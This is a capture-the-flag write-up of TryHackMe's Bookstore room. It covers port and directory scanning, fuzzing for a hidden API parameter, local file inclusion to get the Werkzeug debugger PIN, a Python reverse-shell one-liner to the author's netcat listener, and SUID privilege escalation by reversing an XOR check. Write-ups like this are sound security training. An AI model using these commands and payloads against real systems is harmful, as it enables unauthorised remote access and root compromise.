Hello. I’m Rahmos. Here is my Bookstore — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -T4 -v -p- <ip>
There’re 3 ports opened: 22(SSH), 80(Apache), and 5000(Werkzeug). Werkzeug is a python web’s api. Let’s first access the website at port 80:
I’ve checked the page source (Ctrl+U), but nothing valuable.
Now let’s access /books:
There’s a base32 encoded string. Decode it using https://www.dcode.fr/base-32-encoding:
Then, decode the ascii and I found a youtube link:
Access the youtube:
Well looks like it’s a rabbit hole.
Next, access /login:
So I need to exploit the debugger side. Access port 5000:
Use gobuster to find hidden dirs on this port:
gobuster dir -u http://<ip>:5000 -w /path-to-wordlist
Well, in order to access /console, I need the PIN. By looking back at the page source of login.html page, I know that theb is inside .bash_history file.
Ok so now I know the parameter of the api. So I tried LFI to look for .bash_history but none successful. I even tried to downgrade the api version (v2 to v1) but still invulnerable:
So I think that there’s another parameter which I can use for LFI. I use WFUZZ to fuzz for the hidden parameter:
wfuzz -c -f bookstore.txt -u “http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history” -w /path-to-wordlist -t 100 2>/dev/null — hc 404
Ok so I’ve found the hidden parameter. Let’s use this parameter for LFI:
I’ve got the PIN! It’s time for /console:
I’ve got into the console. I can run Python code here, so let’s spawn a reverse shell to my machine. First, start a listener on your machine:
nc –lvnp 4444
Then run this python code in the web’s console:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<ip> “,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)
After that, I’ve got the shell into the machine as sid:
Get the user flag:
Next, I will find a way to priv escalation to root. First, try sudo –l to see if sid can run sudo:
Well, I haven’t known sid’s password, so I cannot run sudo now. Try with command SUID using find:
find / -perm -u=s 2>/dev/null
This command looks suspicious. Let’s inspect it:
So I need to find the correct number. First, transfer the try-harder script to your machine using scp:
scp try-harder user-name@<ip>:/home/username
Then, use ghidra to decompile the script:
Ok, so if I input the correct number, I will have the bash shell as root (as –p flag will execute bash with SUID, and this command has SUID of root).
Decode the hex to text and I’ve got all the number needed:
Ok so here’s the formula:
“^” means XOR. So a will be: 1573743953
Input this number and I’ve got the root shell! Read the root flag: